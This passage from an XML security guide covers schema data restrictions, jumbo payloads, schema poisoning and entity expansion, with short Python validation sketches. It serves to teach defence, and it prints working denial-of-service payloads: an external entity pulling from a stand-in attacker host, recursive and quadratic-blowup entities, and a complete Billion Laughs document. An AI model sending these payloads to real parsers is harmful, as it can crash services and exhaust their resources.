     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
With the &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; data type, a price set to Infinity or NaN fails validation, so these values never reach the application. If a schema allows them, an attacker can exploit the issue.&lt;br /&gt;
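&lt;br /&gt;
The difference between the two families of data types can be sketched in Python. This is an illustration under assumptions: the regular expression is an approximation of the &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; lexical form (optional sign, digits, optional fraction), and the helper name &amp;lt;tt&amp;gt;is_decimal_lexical&amp;lt;/tt&amp;gt; is hypothetical:&lt;br /&gt;

```python
import math
import re

# Assumed approximation of the decimal lexical form: optional sign, digits,
# optional fractional part. No exponent, no INF, no NaN.
DECIMAL_LEXICAL = re.compile(r"[+-]?([0-9]+(\.[0-9]*)?|\.[0-9]+)")


def is_decimal_lexical(text: str) -> bool:
    """Return True when the text looks like a plain decimal number."""
    return DECIMAL_LEXICAL.fullmatch(text) is not None


for raw in ("10.50", "NaN", "INF", "-INF"):
    as_float = float(raw)  # float parsing accepts all four strings
    special = math.isnan(as_float) or math.isinf(as_float)
    print(raw, "special float:", special, "decimal-valid:", is_decimal_lexical(raw))
```

All four strings parse as floating point values, but only the first one passes the decimal check, which is the behavior the schema above relies on.&lt;br /&gt;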
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights have only three colors, only 12 months are available, and so on. The schema can put these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element &amp;lt;tt&amp;gt;month&amp;lt;/tt&amp;gt; to 12 possible values:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minLength value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where valid values must have one exact length (let's say 8), the length can be specified as follows:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:pattern value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
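&lt;br /&gt;
The same expression can be exercised outside the schema. The following Python sketch assumes that matching the whole string is equivalent to the pattern facet, since schema patterns are implicitly anchored; it does not replicate the whitespace handling of &amp;lt;tt&amp;gt;xs:token&amp;lt;/tt&amp;gt;, and the helper name &amp;lt;tt&amp;gt;is_valid_ssn&amp;lt;/tt&amp;gt; is hypothetical:&lt;br /&gt;

```python
import re

# Same expression as the pattern facet above. Schema patterns match the whole
# value implicitly, so fullmatch() is used instead of search().
SSN_PATTERN = re.compile(r"[0-9]{3}-[0-9]{2}-[0-9]{4}")


def is_valid_ssn(text: str) -> bool:
    """Return True when the text has the three-two-four digit SSN layout."""
    return SSN_PATTERN.fullmatch(text) is not None


print(is_valid_ssn("123-45-6789"))   # True
print(is_valid_ssn("123-45-67890"))  # False: one digit too many
print(is_valid_ssn("x123-45-6789"))  # False: unexpected leading character
```

The pattern only checks the format; it does not tell whether a given number was ever issued.&lt;br /&gt;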
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Not defining a maximum number of occurrences forces the application to cope with whatever happens when it receives an extreme number of items to process. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER LARGENAME1=&amp;quot;LARGEVALUE&amp;quot; LARGENAME2=&amp;quot; LARGEVALUE&amp;quot; LARGENAME3=&amp;quot; LARGEVALUE&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ENTITY file SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;file;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the &amp;lt;tt&amp;gt;note&amp;lt;/tt&amp;gt; element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read files from the server. This type of schema only serves as a suggestion for sending a document; to be used safely, there must be a way to check the integrity of the embedded schema.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
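&lt;br /&gt;
A check for this condition can be sketched in Python. The fragment below is an illustration for POSIX systems only; the helper name &amp;lt;tt&amp;gt;is_world_writable&amp;lt;/tt&amp;gt; is hypothetical, and a temporary file stands in for the schema file:&lt;br /&gt;

```python
import os
import stat
import tempfile


def is_world_writable(path: str) -> bool:
    """Return True when the 'other' permission class has write access."""
    mode_string = stat.filemode(os.stat(path).st_mode)  # e.g. "-rw-rw-rw-"
    return mode_string[8] == "w"  # index 8 is the write flag for 'other'


# Demonstration on a temporary file standing in for the schema file.
with tempfile.NamedTemporaryFile(suffix=".dtd", delete=False) as handle:
    schema_path = handle.name

os.chmod(schema_path, 0o666)
print(is_world_writable(schema_path))  # True on POSIX systems

os.chmod(schema_path, 0o644)
print(is_world_writable(schema_path))  # False on POSIX systems

os.remove(schema_path)
```

The mode string has the same layout as the listing above, so the character inspected here is the second &amp;lt;tt&amp;gt;w&amp;lt;/tt&amp;gt; from the right in that output.&lt;br /&gt;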
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker with access to the traffic could sniff the connection and modify the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; references another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is in turn defined in terms of entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
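&lt;br /&gt;
The amplification can be estimated with simple arithmetic. The following Python sketch is an approximation: it ignores the markup around the entity and assumes each reference to the entity takes three characters (ampersand, name, semicolon). The function name &amp;lt;tt&amp;gt;sizes&amp;lt;/tt&amp;gt; is hypothetical:&lt;br /&gt;

```python
ENTITY_LENGTH = 100_000    # characters in the replacement text of entity A
REFERENCE_COUNT = 100_000  # number of references to A in the document body
REFERENCE_TEXT_LENGTH = 3  # ampersand, one-letter name, semicolon


def sizes(entity_length: int, reference_count: int) -> tuple[int, int]:
    """Return (approximate characters sent, characters after expansion)."""
    sent = entity_length + reference_count * REFERENCE_TEXT_LENGTH
    expanded = entity_length * reference_count
    return sent, expanded


sent, expanded = sizes(ENTITY_LENGTH, REFERENCE_COUNT)
print(sent)              # 400000
print(expanded)          # 10000000000
print(expanded // sent)  # 25000
```

Under these assumptions, a document of roughly 400,000 characters expands to 10,000,000,000 characters once every reference is resolved.&lt;br /&gt;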
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the nested internal entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
